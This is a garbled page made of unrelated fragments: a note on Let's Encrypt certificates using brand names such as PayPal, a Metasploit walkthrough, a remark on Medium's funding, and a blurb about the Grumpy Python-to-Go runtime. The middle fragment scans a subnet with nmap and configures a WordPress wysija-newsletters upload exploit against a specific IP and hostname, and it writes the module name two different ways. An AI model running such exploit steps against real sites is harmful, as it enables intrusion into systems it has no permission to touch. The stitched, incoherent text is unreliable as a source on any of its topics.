By December 8, 2016, Let's Encrypt had issued 409 certificates containing “Paypal” in the hostname; that number is up to 709 as of this morning. Other targets include BankOfAmerica (14 certificates), Apple, Amazon, American Express, Chase Bank, Microsoft, Google, and many other major brands. LetsEncrypt validates only that (at one point in time) the certificate applicant can publish on the target domain; the CA also grudgingly checks with the SafeBrowsing service to see if the target domain has already been blocked as malicious, although they “disagree” that this should be their responsibility. Let's Encrypt’s short position paper is worth a read; many reasonable people agree with it.
This will save the results to the metasploit database
msf > nmap -v -sV 192.168.111.0/24 -oA subnet_1
hosts will list all the hosts found by nmap.
hosts -R will add them to the list of hosts to exploit.
Searching for a WordPress Vulnerability
msf > search name:wordpress
Use an Exploit
This will select an exploit to use:
msf > use exploit/unix/webapp/wp_wysija_newsletters_upload
This will show you the attacks that the exploit will take advantage of:
msf exploit(wp_wysija_newsletters_upload) > show payloads
This will show what software and version will be targeted:
msf exploit(wp_wysija_newsletters_upload) > show targets
0 wysija-newsletter < 2.6.8
Next configure the Exploit
msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletter_upload):
Name Current Settings Required Description
---- ---------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST no The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no The base path to the wordpress application
VHOST no HTTP server virtual host
0 wysija-newsletters < 2.6.8
Here is where we set all the options:
msf exploit(wp_wysija_newsletters_upload) > set RHOST 126.96.36.199
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.life
But I don’t think we’ll grow old together, Medium and I. I suspect it’ll end quite tragic, actually. $132,000,000 is a lot of money after all, and that’s how much venture capital Medium has been dipped in. Before having a prayer or a song about how to turn into that multi-billion-dollar business it must to satisfy the required rate of return.
Grumpy is an experimental Python runtime for Go. It translates Python code into Go programs, and those transpiled programs run seamlessly within the Go runtime. We needed to support a large existing Python codebase, so it was important to have a high degree of compatibility with CPython (quirks and all). The goal is for Grumpy to be a drop-in replacement runtime for any pure-Python project.